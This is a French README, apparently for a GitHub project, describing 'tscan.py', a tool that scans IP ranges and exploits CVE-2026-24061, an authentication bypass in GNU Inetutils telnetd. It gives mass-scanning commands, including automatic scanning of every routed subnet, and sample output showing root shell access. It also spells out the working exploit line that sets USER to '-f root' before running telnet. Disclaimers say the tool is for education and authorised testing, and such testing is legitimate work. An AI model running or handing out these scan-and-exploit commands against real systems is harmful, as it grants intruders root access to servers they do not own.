
Scanner basé sur Python qui détecte et exploite la contournement d'authentification telnetd CVE-2026-24061, permettant un accès root au shell sur les services GNU Inetutils vulnérables.
Un scanner basé sur Python pour détecter et exploiter la vulnérabilité CVE-2026-24061 dans les services telnetd de GNU Inetutils. Cet outil analyse des adresses IP ou des réseaux à la recherche de services telnetd vulnérables permettant un contournement d'authentification menant à un accès root au shell.
CE LOGICIEL EST FOURNI UNIQUEMENT À DES FINS ÉDUCATIVES ET DE TESTS DE SÉCURITÉ AUTORISÉS.
Cette application a été développée uniquement à des fins éducatives pour démontrer des vulnérabilités de sécurité et pour assister dans les tests de sécurité et la recherche autorisés.
CE LOGICIEL EST FOURNI « EN L'ÉTAT », SANS GARANTIE D'AUCUNE SORTE, EXPRESSE OU IMPLICITE, Y COMPRIS, SANS S'Y LIMITER, LES GARANTIES DE QUALITÉ MARCHANDE, D'ADAPTATION À UN USAGE PARTICULIER ET D'ABSENCE DE CONTREFAÇON. LES AUTEURS ET CONTRIBUTEURS NE GARANTISSENT PAS QUE LE LOGICIEL SERA EXEMPT D'ERREURS, SÉCURISÉ OU FONCTIONNEL. Le logiciel peut contenir des bogues, des erreurs ou d'autres défauts.
TOUTE RESPONSABILITÉ ET TOUTE OBLIGATION LIÉES À L'UTILISATION DE CE LOGICIEL INCOMBENT ENTIÈREMENT À L'UTILISATEUR. Les auteurs, contributeurs et distributeurs de ce logiciel ne pourront être tenus responsables de tout dommage, perte ou conséquence juridique résultant de l'utilisation, de la mauvaise utilisation ou de l'incapacité à utiliser ce logiciel.
Cet outil doit UNIQUEMENT être utilisé sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test. L'accès non autorisé à des systèmes informatiques est illégal et peut entraîner des poursuites pénales.
Les auteurs ne GARANTISSENT PAS :
En utilisant ce logiciel, vous reconnaissez avoir lu, compris et accepté d'être lié par ces conditions. Si vous n'êtes pas d'accord, n'utilisez pas ce logiciel.
Développé par : Cuma KURT
Email : [email protected]
LinkedIn : https://www.linkedin.com/in/cuma-kurt-34414917/
CVE-2026-24061 : telnetd de GNU Inetutils jusqu'à la version 2.7 permet un contournement d'authentification à distance via une valeur -f root pour la variable d'environnement USER.
Score CVSS : 9,8 (Critique)
Référence : NVD CVE-2026-24061
telnet (généralement préinstallé sur Linux/macOS)pip3 install -r requirements.txt
Remarque : La plupart des dépendances font partie de la bibliothèque standard de Python. L'outil fonctionne directement avec Python 3.6+.
# Analyser une seule adresse IP
python3 tscan.py 192.168.1.1
# Analyser un réseau CIDR
python3 tscan.py 192.168.1.0/24
# Analyser avec un port personnalisé
python3 tscan.py -p 2323 192.168.1.1
# Analyser des cibles à partir d'un fichier
python3 tscan.py targets.txt
# Analyser plusieurs adresses IP
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1
# Analyser plusieurs réseaux CIDR
python3 tscan.py 192.168.1.0/24 10.0.0.0/16
# Augmenter le nombre de threads pour une analyse plus rapide (100 threads)
python3 tscan.py -t 100 192.168.1.0/24
# Augmenter le délai d'attente pour les réseaux lents
python3 tscan.py --timeout 10 192.168.1.0/24
# Combiner les deux pour les analyses de grands réseaux
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16
# Détecter et analyser automatiquement tous les sous-réseaux à partir de la table de routage du système
python3 tscan.py --auto
# ou utiliser la forme courte :
python3 tscan.py -a
# Détection automatique avec port personnalisé
python3 tscan.py --auto -p 2323
# ou :
python3 tscan.py -a -p 2323
# Détection automatique avec un nombre élevé de threads
python3 tscan.py --auto -t 200
# ou :
python3 tscan.py -a -t 200
Remarque : Le mode --auto lit la table de routage du système à l'aide de la commande ip route list ou route -n et analyse automatiquement tous les sous-réseaux détectés.
# Exemple 1 : Analyse rapide du réseau local
python3 tscan.py 192.168.1.0/24
# Exemple 2 : Analyse rapide avec forte concurrence
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16
# Exemple 3 : Analyser un port telnet non standard
python3 tscan.py -p 2323 192.168.1.0/24
# Exemple 4 : Détection automatique et analyse de tous les sous-réseaux locaux
python3 tscan.py --auto
# ou :
python3 tscan.py -a
# Exemple 5 : Détection automatique avec paramètres personnalisés
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# ou :
python3 tscan.py -a -p 2323 -t 100 --timeout 8
arguments positionnels :
targets Adresse(s) IP, réseau(x) CIDR ou chemin(s) de fichier contenant les cibles
options :
-h, --help Affiche ce message d'aide et quitte
-p, --port PORT Port telnet à analyser (par défaut : 23)
-t, --threads THREADS Nombre de threads concurrents (par défaut : 50)
--timeout TIMEOUT Délai d'attente de connexion en secondes (par défaut : 5)
-v, --verbose Sortie détaillée
-a, --auto Détecte et analyse automatiquement tous les sous-réseaux à partir de la table de routage du système (route -n ou ip route list)
Créez un fichier texte avec une cible par ligne :
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16
Les lignes commençant par # sont traitées comme des commentaires et ignorées.
L'outil fournit :
Progression en Temps Réel : Affiche les résultats au fur et à mesure de leur découverte
[!] - Hôte vulnérable[~] - Port ouvert mais non vulnérableRapport Récapitulatif : Comprend :
[*] Démarrage de l'analyse sur 256 cible(s)...
[*] Port : 23, Threads : 50, Délai d'attente : 5s
[*] Progression : [████████████████░░░░░░░░░░░░░░░░░░░░] 40,0 % (102/256) | Ouverts : 2 | Vulnérables : 1
[!] 192.168.1.100:23 - VULNÉRABLE
[*] Progression : [████████████████████████████████████] 100,0 % (256/256) | Ouverts : 3 | Vulnérables : 1
[+] Analyse terminée : 256/256 cibles analysées
======================================================================
Résumé des Résultats d'Analyse
======================================================================
Services telnet trouvés : 3
Hôtes vulnérables : 1
[!] HÔTES VULNÉRABLES :
● 192.168.1.100:23
Sortie : uid=0(root) gid=0(root) groups=0(root)...
[~] Services telnet trouvés mais non vulnérables :
● 192.168.1.101:23
● 192.168.1.102:23
[*] Analyse terminée en 12,34 secondes
USER="-f root"telnet -aLa vulnérabilité permet un contournement d'authentification en définissant la variable d'environnement USER sur -f root :
USER="-f root" telnet -a IP_CIBLE [PORT]
Cela amène telnetd à interpréter la variable USER comme un indicateur, contournant l'authentification et accordant un accès root.
telnetip route list ou route -nInstallez le client telnet :
# Debian/Ubuntu
sudo apt-get install telnet
# CentOS/RHEL
sudo yum install telnet
# macOS
# Généralement préinstallé
--timeout 10Cet outil est destiné à :
N'UTILISEZ PAS cet outil pour :
Ce programme est un logiciel libre : vous pouvez le redistribuer et/ou le modifier selon les termes de la Licence Publique Générale GNU telle que publiée par la Free Software Foundation, soit la version 3 de la Licence, soit (à votre choix) toute version ultérieure.
Ce programme est distribué dans l'espoir qu'il sera utile, mais SANS AUCUNE GARANTIE ; sans même la garantie implicite de QUALITÉ MARCHANDE ou d'ADAPTATION À UN USAGE PARTICULIER. Voir la Licence Publique Générale GNU pour plus de détails.
Vous devriez avoir reçu une copie de la Licence Publique Générale GNU avec ce programme. Sinon, voir https://www.gnu.org/licenses/.
Voir le fichier LICENSE pour le texte complet de la Licence Publique Générale GNU v3.0.
LES AUTEURS ET CONTRIBUTEURS NE SONT PAS RESPONSABLES DE TOUTE MAUVAISE UTILISATION OU DE TOUT DOMMAGE CAUSÉ PAR CET OUTIL.
Cet outil est fourni UNIQUEMENT À DES FINS ÉDUCATIVES ET DE TESTS DE SÉCURITÉ AUTORISÉS.
UTILISATION À VOS PROPRES RISQUES. Toute responsabilité et toute obligation liées à l'utilisation de ce logiciel incombent entièrement à l'utilisateur. Les auteurs ne garantissent pas l'exactitude, la sécurité ou la fonctionnalité de ce logiciel. Le logiciel est fourni « EN L'ÉTAT » sans aucune garantie d'aucune sorte.
Cette application a été développée uniquement à des fins éducatives. En utilisant ce logiciel, vous reconnaissez que :
Si vous n'acceptez pas ces conditions, N'UTILISEZ PAS CE LOGICIEL.